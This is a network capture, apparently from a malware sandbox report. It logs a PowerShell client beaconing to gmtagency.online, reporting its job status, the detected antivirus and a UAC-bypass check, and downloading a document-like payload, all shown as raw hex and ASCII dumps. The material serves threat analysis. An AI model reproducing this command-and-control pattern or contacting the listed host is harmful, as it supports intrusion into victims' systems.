6d 47 56 62 47 4b 53 63 6c 79 42 54 31 54 79 50 6d 58 7b 5b 44 4b 69 4c 44 5b 48 58 7b 43 46 58 57 57 57 52 55 47 53 57 57 6d 32 54 57 57 72 50 6d 47 54 63 Data Ascii: KSLD[BT0WFPlDvSjmYWT[`WWWJdmGW`G[SWoCRTWejPmKDPjKUWT[BXWWFRGKWSlqSWTn{TWWjL0GYSmKScYCBTkCVPmqGSjOkST[HU1WF`WnvSkKSWVS3TWeNL0GtVjKRdmKBT0ejPj5vSjKOST[DVkCFU0GWSo[SWVyBTWejPmDvSjKUWT[BXUCFRGnvSlGWWTqwTWWjTmGVbGKSclyBT1TyPmX{[DKiLD[HX{CFXWWWRUGSWWm2TWWrPmGTc
2024-11-15 00:00:56 UTC	1369	IN	Data Raw: 46 50 6d 4f 57 53 6a 4b 60 4c 44 5b 4b 55 54 57 46 53 57 57 57 53 6a 79 53 57 54 34 42 54 57 57 72 50 6d 47 59 5b 44 4b 53 4c 44 5b 42 54 6a 5b 46 50 6d 4c 76 53 6a 6d 4f 53 54 5b 47 57 57 57 46 55 47 47 57 53 59 65 53 57 54 34 74 54 56 71 4e 50 6d 48 78 5b 44 4b 5b 57 6a 5b 45 58 7b 43 46 52 47 5b 57 53 6a 79 53 57 54 5b 78 54 57 57 6a 55 6d 47 59 52 6b 4f 53 60 6a 5b 42 54 6f 71 52 50 6d 71 47 53 6a 4b 60 4c 44 5b 44 55 54 57 46 58 56 50 76 52 59 65 53 57 54 34 42 54 57 54 79 50 6d 47 58 50 6a 4b 53 57 44 4b 42 54 55 4b 6a 50 31 35 76 53 6a 4b 4f 53 54 5b 44 56 6b 43 46 52 30 47 57 53 59 65 53 57 54 34 74 54 57 57 76 50 6d 4f 46 53 6a 4b 5b 4c 6c 53 45 55 6d 57 46 52 56 4c 76 53 6a 57 57 57 54 5b 4c 54 57 57 4e 50 6d 47 57 63 44 4b 53 57 33 53 42 54 55 Data Ascii: FPmOWSjK`LD[KUTWFSWWWSjySWT4BTWWrPmGY[DKSLD[BTj[FPmLvSjmOST[GWWWFUGGWSYeSWT4tTVqNPmHx[DK[Wj[EX{CFRG[WSjySWT[xTWWjUmGYRkOS`j[BToqRPmqGSjK`LD[DUTWFXVPvRYeSWT4BTWTyPmGXPjKSWDKBTUKjP15vSjKOST[DVkCFR0GWSYeSWT4tTWWvPmOFSjK[LlSEUmWFRVLvSjWWWT[LTWWNPmGWcDKSW3SBTU
2024-11-15 00:00:56 UTC	1369	IN	Data Raw: 4c 54 5b 45 5b 47 57 46 52 57 65 57 53 6c 6d 6a 4c 44 71 34 54 57 57 6a 57 6d 47 57 64 47 4b 53 60 30 71 42 54 31 65 6a 50 6d 6a 76 53 6a 4f 6d 57 54 5b 48 57 6d 57 46 60 6c 50 76 52 6b 5b 53 57 56 53 78 54 57 65 4a 4c 30 47 74 57 6a 4b 53 4c 44 5b 42 54 7b 43 46 50 30 6d 73 53 6a 65 54 57 54 5b 72 57 57 57 4a 4f 6d 47 57 60 47 4b 53 57 6f 43 52 54 56 34 52 50 6d 47 37 54 6a 4b 56 60 31 5b 45 58 6a 57 46 52 57 6e 76 53 6c 75 53 57 54 58 79 54 57 57 56 57 6d 47 59 52 6c 34 53 63 59 43 42 54 6f 71 6e 50 6d 65 73 53 6a 4f 6b 53 54 5b 48 55 6a 57 46 58 56 50 76 52 6c 75 53 57 57 4b 33 54 57 54 34 63 6d 47 72 56 6a 4b 52 63 44 5b 42 57 56 30 6a 50 6a 34 47 53 6a 53 4e 53 54 5b 55 5b 45 43 4a 62 30 47 57 60 47 4b 53 57 6d 58 7b 54 56 71 42 50 6d 4f 47 63 44 4b Data Ascii: LT[E[GWFRWeWSlmjLDq4TWWjWmGWdGKS`0qBT1ejPmjvSjOmWT[HWmWF`lPvRk[SWVSxTWeJL0GtWjKSLD[BT{CFP0msSjeTWT[rWWWJOmGW`GKSWoCRTV4RPmG7TjKV`1[EXjWFRWnvSluSWTXyTWWVWmGYRl4ScYCBToqnPmesSjOkST[HUjWFXVPvRluSWWK3TWT4cmGrVjKRcD[BWV0jPj4GSjSNST[U[ECJb0GW`GKSWmX{TVqBPmOGcDK
2024-11-15 00:00:56 UTC	1369	IN	Data Raw: 6d 65 73 53 6a 4f 6a 60 31 5b 4b 56 55 43 46 60 6c 50 76 53 6c 34 53 57 57 6e 7b 54 57 57 72 63 6d 47 59 63 44 4b 53 4c 44 5b 42 54 33 30 6a 50 6d 6e 76 53 6a 69 4f 53 54 5b 6e 5b 45 43 4a 62 6d 47 57 5b 49 4b 53 57 31 34 74 54 57 65 6a 50 6d 44 76 63 44 4b 55 57 33 53 45 54 6a 57 46 53 56 48 76 53 6d 6d 53 57 54 71 5b 54 57 57 6a 62 6d 47 59 52 6c 34 53 63 59 53 42 54 6f 71 6e 50 6d 71 48 5b 44 4f 6d 60 31 5b 44 54 57 57 46 56 57 47 57 52 6d 57 53 57 56 69 78 54 57 65 4e 4c 30 47 70 50 6a 4b 52 4c 57 5b 42 56 56 79 46 50 6c 57 73 53 6a 57 55 57 54 5b 5b 54 57 57 46 62 47 47 57 55 6a 71 53 57 56 79 42 54 57 62 79 50 6d 44 76 53 6a 4b 59 56 46 53 45 5b 46 75 46 52 57 47 57 53 6c 79 57 57 54 5b 74 54 57 57 4e 52 6d 47 57 63 46 34 53 60 30 4b 42 54 6a 62 34 Data Ascii: mesSjOj`1[KVUCF`lPvSl4SWWn{TWWrcmGYcDKSLD[BT30jPmnvSjiOST[n[ECJbmGW[IKSW14tTWejPmDvcDKUW3SETjWFSVHvSmmSWTq[TWWjbmGYRl4ScYSBToqnPmqH[DOm`1[DTWWFVWGWRmWSWVixTWeNL0GpPjKRLW[BVVyFPlWsSjWUWT[[TWWFbGGWUjqSWVyBTWbyPmDvSjKYVFSE[FuFRWGWSlyWWT[tTWWNRmGWcF4S`0KBTjb4
2024-11-15 00:00:56 UTC	1369	IN	Data Raw: 6d 32 56 55 4b 53 4f 57 6d 54 55 59 69 4e 60 6d 4b 75 55 59 71 47 4f 57 6d 75 55 55 4f 4f 57 30 4b 70 56 6c 71 56 60 6a 34 70 55 6c 6d 51 57 46 72 78 55 56 71 47 4f 57 71 45 52 56 65 4c 57 57 4b 72 58 7b 4f 52 62 46 4b 75 53 6b 43 69 57 7b 6d 30 52 54 4f 4a 53 44 38 72 64 47 69 69 57 7b 57 73 58 6b 4f 6a 64 6a 6d 46 64 47 53 6d 56 44 35 76 56 6d 62 76 64 6a 30 72 64 49 65 6b 63 55 6d 32 58 7b 4f 72 64 6a 79 75 54 6f 4f 68 50 31 6a 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6f 43 60 60 56 65 73 56 6a 62 34 4c 33 4b 75 64 49 5b 5b 57 30 4b 55 56 6d 69 4e 4c 56 4b 48 54 56 65 4c 57 30 5b 35 52 54 4f 52 4c 46 4f 74 57 6c 79 4d 54 55 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 57 32 4c 44 75 4b 50 Data Ascii: m2VUKSOWmTUYiN`mKuUYqGOWmuUUOOW0KpVlqV`j4pUlmQWFrxUVqGOWqERVeLWWKrX{ORbFKuSkCiW{m0RTOJSD8rdGiiW{WsXkOjdjmFdGSmVD5vVmbvdj0rdIekcUm2X{OrdjyuToOhP1j2SGGw[1mEPVeKP1GoRTOC[1mEPoC``VesVjb4L3KudI[[W0KUVmiNLVKHTVeLW0[5RTORLFOtWlyMTUCMRTOC[1mEPVeKP1GoRTOC[3W2LDuKP

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:00:58 UTC	286	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b8f1bbebbccff7ba9c62dc379cc23851a0 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 85
2024-11-15 00:00:58 UTC	85	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4a 6f 62 20 69 73 20 72 75 6e 6e 69 6e 67 2e 20 4a 6f 62 20 49 44 3a 20 31 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 43 68 65 63 6b 20 6d 75 74 65 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Job is running. Job ID: 1\"", "\"Check mutext\"", "----------"]
2024-11-15 00:00:58 UTC	953	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:00:58 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2JxVRHtbBkS6Cx1v%2F3yoYgaUW4bLkmqw%2Fo%2BPU7swe6lBKuEToETm3euisLLQeYSV9%2BqaajfD7q80He5%2BdLTLZXmgxOz5DcLpF7f%2BEL7NuXov9fyhpaeZJQ%2BScMecKfJopIpTQ%2BrCjJCj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4040&sent=16197&recv=8640&lost=0&retrans=0&sent_bytes=22181245&recv_bytes=776718&delivery_rate=48105922&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af6cd8ca5e74d-DEN server-timing: cfL4;desc="?proto=TCP&rtt=19113&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1031&delivery_rate=151306&cwnd=32&unsent_bytes=0&cid=d3d6e9fb31a39d0a&ts=657&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:00:59 UTC	286	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b8f1bbebbccff7ba9c62dc379cc23851a0 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 86
2024-11-15 00:00:59 UTC	86	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 4d 75 74 65 78 20 69 73 20 6e 6f 74 20 6c 6f 63 6b 65 64 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 41 56 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Mutex is not locked\"", "\"AV Windows Defender\"", "----------"]
2024-11-15 00:01:00 UTC	946	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:00 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eu7kUYsxOITSyXKkroIWrGDdKsQEKKsqAFp0L2jHuFvUiVILBd%2BIVTgj%2BhQJdNo7uibMmWcZosGp3%2F2yECRdjPAjOtkcskVE9bzzph5JKMoSGhwWCNkEzBlhvmpjfcUTWPzT9XBhHQvu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=29742&sent=60464&recv=30335&lost=0&retrans=0&sent_bytes=84540956&recv_bytes=1471464&delivery_rate=40500340&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af6d5bae94588-ATL server-timing: cfL4;desc="?proto=TCP&rtt=19988&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1032&delivery_rate=144294&cwnd=32&unsent_bytes=0&cid=9e39903891360853&ts=735&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:01:00 UTC	391	OUT	GET /file2/282c5801f46fcda2f05a0753c406ba90ef61497ac93e4afda4a01872ecfc3b3b0547cc186ef952e03434e53d14a6be634cc8976c1de586c6716f1299450c444bdca9c3eed651a15ce96c3d1ed385d68e046d90581d0518767912d0a8edd694f9b22d70d1c6269597baf745481c650497 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Connection: Keep-Alive
2024-11-15 00:01:00 UTC	1061	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:00 GMT Content-Type: application/octet-stream Content-Length: 98366 Connection: close content-disposition: attachment; filename=file; filename*=UTF-8''file cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2eX2l2Fo7SY4n8Zs2I76OUUpjqK3GkKu4LYtEndmLshjd6fKbJtMN0uUzvDV0Fq9v3cBa%2FM%2BaK9Kx06AnukFpZJaK7nq8f0TRI323uHV%2FedFxm2NKv1nrWrZE6700dTUxOJpLM9mSMa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19259&sent=34115&recv=17688&lost=0&retrans=46&sent_bytes=47376079&recv_bytes=747037&delivery_rate=49415384&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af6d95f3e7b2a-DEN server-timing: cfL4;desc="?proto=TCP&rtt=19133&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1005&delivery_rate=151250&cwnd=32&unsent_bytes=0&cid=f0fb99596ef2f0b9&ts=472&x=0"
2024-11-15 00:01:00 UTC	308	IN	Data Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a3 ef bb 1d 65 01 00 00 52 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: PK!eR[Content_Types].xml (
2024-11-15 00:01:00 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-11-15 00:01:00 UTC	1369	IN	Data Raw: f0 bc d1 ea 7a a3 bf a7 c5 89 85 2c 09 a1 09 89 2f fb 7c 66 5c 12 5a fe e7 8a e6 19 3f 36 ef 21 59 b4 5f e1 6f 1b 9c 5d 41 f3 01 00 00 ff ff 03 00 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 07 df 5f 28 41 08 00 00 77 1f 00 00 11 00 00 00 77 6f 72 64 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c d4 59 fb 6f e3 b8 11 fe bd 40 ff 07 c2 07 14 3d 60 13 bd 2c c9 d6 5d 72 f0 33 17 74 1f c6 6e ba 05 5a 14 0b 5a a2 2d 36 92 28 50 94 ed 5c 71 ff fb cd 90 92 ed d8 bb 89 93 74 b7 77 0e d6 7c 7f 1c 7e 9c 19 ce 78 7f fc 69 93 67 64 c5 64 c5 45 71 d1 71 ce ed 0e 61 45 2c 12 5e 2c 2f 3a 7f bf 99 9e f5 3a a4 52 b4 48 68 26 0a 76 d1 b9 63 55 e7 a7 cb 3f ff e9 c7 75 94 88 b8 ce 59 a1 08 40 14 55 b4 2e e3 8b 4e aa 54 19 59 56 15 a7 2c a7 d5 79 ce 63 29 2a b1 50 e7 b1 c8 2d b1 58 f0 Data Ascii: z,/\|f\Z?6!Y_o]APK!_(Awword/document.xmlYo@=`,]r3tnZZ-6(P\qtw\|~xigddEqqaE,^,/::RHh&vcU?uY@U.NTYV,yc)*P-X
2024-11-15 00:01:00 UTC	1369	IN	Data Raw: 26 7f f9 6e 33 f8 41 7f 8d 71 16 2f 8d a7 aa 95 40 a7 15 c3 ad de 91 25 2b 98 a4 8a 25 8d 10 f1 db d5 15 52 c3 e3 a9 84 bd 50 2f 69 a4 c9 6a 7a 5e 83 9e 54 6d b6 f5 8c 60 dd 84 c8 85 18 81 c7 5e b2 41 55 02 47 a8 53 da 10 1e de ff a5 bb ee 41 8d 21 76 23 b5 3c 8e 8c 1e 87 42 f7 02 e4 03 1a d4 d0 d9 34 62 41 ed c5 68 c5 0a ae 16 cf 8c 0d a0 e2 9b 6b 40 bb 2f 4a 81 37 72 24 d4 3c e3 e5 14 bc 30 72 89 75 22 23 96 cf d1 71 80 27 40 33 a8 14 60 81 8d 49 78 e6 34 e3 34 2b 53 fa 46 24 53 be 21 34 47 17 84 cf 02 6e 46 d1 90 5e 57 aa a9 99 fb f8 af db 1b 80 d3 74 87 67 23 df 1e 9d 75 ed 70 72 36 e8 77 c3 b3 d0 9e 84 5d bb db 73 46 ce e8 57 44 06 4f 53 57 a8 8f 34 1b 97 bc 55 8e 53 b3 ae bd fc df 6e 94 72 45 b5 95 e2 b9 b5 40 6d a9 45 b4 cc 79 51 56 78 71 98 8a 53 Data Ascii: &n3Aq/@%+%RP/ijz^Tm`^AUGSA!v#<B4bAhk@/J7r$<0ru"#q'@3`Ix44+SF$S!4GnF^Wtg#upr6w]sFWDOSW4USnrE@mEyQVxqS
2024-11-15 00:01:00 UTC	1369	IN	Data Raw: 59 4f 69 17 4f ed 87 f1 18 16 53 0e f7 73 3a b4 ce 52 25 77 fd c8 e3 37 9a 92 b8 9b 53 42 9b 74 0f 27 01 83 8d 96 c7 b0 c8 bc 55 df 0e fc ec d8 ca 2f 00 00 00 ff ff 03 00 50 4b 03 04 0a 00 00 00 00 00 00 00 21 00 0c a1 5c 93 49 46 01 00 49 46 01 00 15 00 00 00 77 6f 72 64 2f 6d 65 64 69 61 2f 69 6d 61 67 65 31 2e 70 6e 67 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 20 00 00 02 15 08 06 00 00 00 29 b0 9b c2 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 ff a5 49 44 41 54 78 5e ec dd 07 80 54 d5 d9 ff 71 13 35 cd c4 c4 f4 d7 14 63 8c 31 a6 99 62 34 b1 6b ac 74 96 5e 05 91 de 3b 52 a4 89 f4 ae d2 45 41 40 44 54 10 95 de 96 ed bb 33 3b e5 Data Ascii: YOiOSs:R%w7SBt'U/PK!\IFIFword/media/image1.pngPNGIHDR )sRGBgAMAapHYs~IDATx^Tq5c1b4kt^;REA@DT3;
2024-11-15 00:01:00 UTC	1369	IN	Data Raw: 84 10 42 08 21 da 8c 04 88 10 42 08 21 84 10 a2 cd 48 80 08 21 84 10 42 08 21 da 8c 04 88 10 42 08 21 84 10 a2 cd 48 80 08 21 84 10 42 08 21 da 8c 04 88 10 42 08 21 84 10 a2 cd 48 80 08 21 84 10 42 08 21 da 8c 04 88 10 42 08 21 84 10 a2 cd 48 80 08 21 84 10 42 08 21 da 8c 04 88 10 42 08 21 84 10 a2 cd 48 80 08 21 84 10 42 08 21 da 8c 04 88 10 42 08 21 84 10 a2 cd 48 80 08 21 84 10 42 08 21 da 8c 04 88 10 42 08 21 84 10 a2 cd 48 80 08 21 c4 17 a5 11 17 17 e8 73 84 10 42 88 2b 9c 04 88 10 42 7c 51 02 45 87 bf 40 9f 23 84 10 42 5c e1 24 40 84 10 e2 8b e2 0d 0d 78 99 b7 1b 9a bc d0 a4 04 fc 5c 21 84 10 e2 0a 25 01 22 84 10 5f 14 6f 70 48 80 08 21 84 10 cd 24 40 84 10 e2 f3 e2 17 19 fe cc 00 31 23 c4 17 20 5e be 8f 0d f4 98 42 08 21 c4 15 46 02 44 08 21 3e 2f Data Ascii: B!B!H!B!B!H!B!B!H!B!B!H!B!B!H!B!B!H!B!B!H!sB+B\|QE@#B\$@x\!%"_opH!$@1# ^B!FD!>/
2024-11-15 00:01:00 UTC	1369	IN	Data Raw: 4c 0e 7d 3e 07 c8 a5 ac 03 e1 b7 f3 9f 9f 10 42 08 f1 e5 25 01 22 84 10 97 cd 88 0f 3e f5 15 df e6 e9 52 3c 6d 8a 37 16 74 12 15 20 76 1b fa c5 52 80 38 63 bc 01 72 be 41 49 6e f4 b0 45 a0 4b e4 69 f4 0a 3f 89 d9 f1 76 ec 2c cc 80 9d d2 83 a7 73 f1 b6 20 17 7b 3b ff 79 09 21 84 10 5f 7e 12 20 42 08 71 d9 ce 0f 90 0a 0a 02 1e b9 b0 92 3d 85 c5 98 6c 89 a5 00 b9 50 7c 18 23 21 bd 5d 9a 71 9b 22 a5 b7 3d 0a 03 c2 4e 61 49 8a 0b 47 1a ab d4 63 f1 63 f2 e9 7d 79 84 c5 9f f9 76 fe f3 12 42 08 21 be fc 24 40 84 10 e2 b2 f9 07 48 83 5a 8c ce b1 c0 3b 9b 47 50 20 ec c8 29 c0 f8 c8 a8 4f 0d 10 5e 17 d2 c5 c9 e8 36 45 48 10 05 c8 78 2d 1a 5b 0a d2 11 89 7a 35 0a c2 01 d2 5a e0 e7 24 84 10 42 7c 35 48 80 08 21 c4 65 f3 06 48 53 9d 2a 02 33 40 e2 29 3e 82 ab eb b0 25 Data Ascii: L}>B%">R<m7t vR8crAInEKi?v,s {;y!_~ Bq=lP\|#!]q"=NaIGcc}yvB!$@HZ;GP )O^6EHx-[z5Z$B\|5H!eHS*3@)>%
2024-11-15 00:01:00 UTC	1369	IN	Data Raw: a8 a9 57 f4 ff 78 f4 83 d7 7f c4 93 39 ae 58 3c 73 fa 43 74 b6 85 a0 93 2d cc 1b 1e 97 12 20 7c dd 3f 40 c2 ce 0b 90 1e f6 60 f4 b1 9e c6 80 98 93 18 10 7e 04 63 43 8f e2 68 55 31 12 28 30 f8 eb f3 34 30 8e 0f 8e 90 7a fa b3 e5 69 58 94 08 01 9f bb a1 75 4c f0 22 76 3e a5 6f ad 4f 43 43 b5 62 dc 36 4f f9 db cc f8 bc 40 8f 2d 84 10 42 5c 98 04 88 10 57 b2 d6 c1 d1 5a a0 cf 11 97 84 a7 5e 15 d7 d5 ab b3 5f 65 90 e0 ba 6a cc 8c b7 e1 a9 b3 87 d0 d1 19 8a 0e ce 70 f0 4e e8 66 7c 74 b5 87 a3 0b 9f d9 ca 87 02 c5 1b 1c ad 99 01 d2 c5 15 a2 74 a5 10 09 72 9e 41 0f c7 29 f4 b6 9f 40 5f db 09 0c 89 39 86 57 d2 3d 38 59 59 02 77 5d 1d ca e8 39 f0 5a 74 b5 3e 9e 9e 1c 4f c7 32 9e eb f9 a1 a1 d0 07 fa f3 45 47 63 a5 4f 5d 43 85 a2 6e 7b 63 a4 39 48 78 82 17 7d 6e a0 Data Ascii: Wx9X<sCt- \|?@`~cChU1(040ziXuL"v>oOCCb6O@-B\WZ^_ejpNf\|ttrA)@_9W=8YYw]9Zt>O2EGcO]Cn{c9Hx}n
2024-11-15 00:01:00 UTC	1369	IN	Data Raw: ca e8 92 f7 8c e0 0d f4 2a 88 79 9d 67 f3 f3 94 1d de 3f c2 3b 7f 47 3d 26 87 86 ff c2 f4 d6 eb 43 fc 9d f7 7c ae 60 aa d5 e8 75 e3 35 17 e7 50 85 29 91 14 06 27 df 43 57 c7 59 74 8e 8b f0 06 88 11 1e 06 8a 0c 73 8a 95 57 73 70 b4 66 c4 47 67 e7 69 af 93 4a 27 c7 09 2f 1e 01 39 83 2e 96 53 e8 66 39 89 6e d6 e3 e8 63 39 86 e7 c2 3e c2 22 57 18 3e ae c8 40 32 fd c1 97 a0 92 82 a1 1c 35 0d a5 5e c5 4a 55 7d 91 e2 1b f5 08 10 1f 6a d4 a3 86 a2 a3 36 d5 b8 54 b2 48 0e aa ab f3 50 55 95 a3 3e c7 58 8c ce ab 61 f8 07 cd 1c 05 b9 bc b7 40 af af 10 42 88 2b 97 04 88 10 57 12 ea 86 f3 22 84 2e f9 3e 3e 3c 2c 6c 6c 82 56 54 0c 4b 51 01 3c 4d 75 48 a3 fb 32 09 9f c9 89 4f 27 cb 2b 02 f8 dc 48 1c 22 bc 80 99 a3 82 63 83 77 7a 60 12 21 cd 38 40 f8 25 ce 26 67 1a 2b 30 Data Ascii: *yg?;G=&C\|`u5P)'CWYtsWspfGgiJ'/9.Sf9nc9>"W>@25^JU}j6THPU>Xa@B+W".>><,llVTKQ<MuH2O'+H"cwz`!8@%&g+0
2024-11-15 00:01:00 UTC	911	IN	Data Raw: 7f fb 76 0c 3b b9 06 5b dc 07 60 ab 75 51 80 66 d2 9f 57 26 6a 1b 33 29 44 32 50 d5 98 86 ca 06 0a 0f 52 51 9f ac a6 5c f1 c8 87 11 1f 2e 85 a3 43 a9 b1 2b 95 b5 0e 9f f2 2a 0d a5 15 6e 0a 90 64 15 35 8d 8d 85 de 3c 95 00 11 42 08 71 71 12 20 42 5c 91 8c 11 87 6a 6f 7c d4 a2 46 c5 48 22 1d 18 ee 2f c9 c5 78 dd 86 f6 11 74 50 1c ef 46 a7 38 1d dd e9 b2 87 4b 47 ef 58 1b fa c4 44 a3 5f 78 38 46 d9 62 31 f2 5c 08 66 52 8c 2c d3 34 bc 99 9a 82 33 95 55 d0 e9 80 91 d7 3d f0 e9 67 cd b3 67 99 41 a2 42 84 8e 3b bd 67 f1 35 d6 a4 04 7c 7e 5f 7d 7c 88 cd 93 8e b4 ba 6a 6c cd 8e c7 90 88 63 e8 14 cd 01 72 16 dd f4 48 74 73 fa 07 48 f0 25 06 48 80 f8 60 14 1f 5d 9d fe 01 72 c4 08 10 8e 0f c7 47 cd 01 e2 1d fd e8 ea 7a 13 7d 9c db d0 f3 c8 12 cc 0c dd 88 83 b9 a7 91 Data Ascii: v;[`uQfW&j3)D2PRQ\.C+*nd5<Bqq B\jo\|FH"/xtPF8KGXD_x8Fb1\fR,43U=ggAB;g5\|~_}\|jlcrHtsH%H`]rGz}

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:01:01 UTC	286	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b8f1bbebbccff7ba9c62dc379cc23851a0 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 62
2024-11-15 00:01:01 UTC	62	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 30 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 6f 20 63 61 6e 20 62 79 70 61 73 73 20 75 61 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "0", "\"ko can bypass uac\"", "----------"]
2024-11-15 00:01:01 UTC	946	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:01:01 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXdJYZbPZMgEpTse81RfdUvxqtR4rV1qTBC9CugA6Tx9HGYQK0ySdcbxuUUEyljPIpGPpfKPC5JjvWrtHh64fZCL1Gad01O0zWo3fMHVWdAH%2F%2BxuB9bM0%2BhfrwEOPr67S9enwW9A1NcU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2098&sent=41554&recv=21709&lost=0&retrans=35&sent_bytes=57428381&recv_bytes=1398820&delivery_rate=49991580&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af6de9966b0a9-ATL 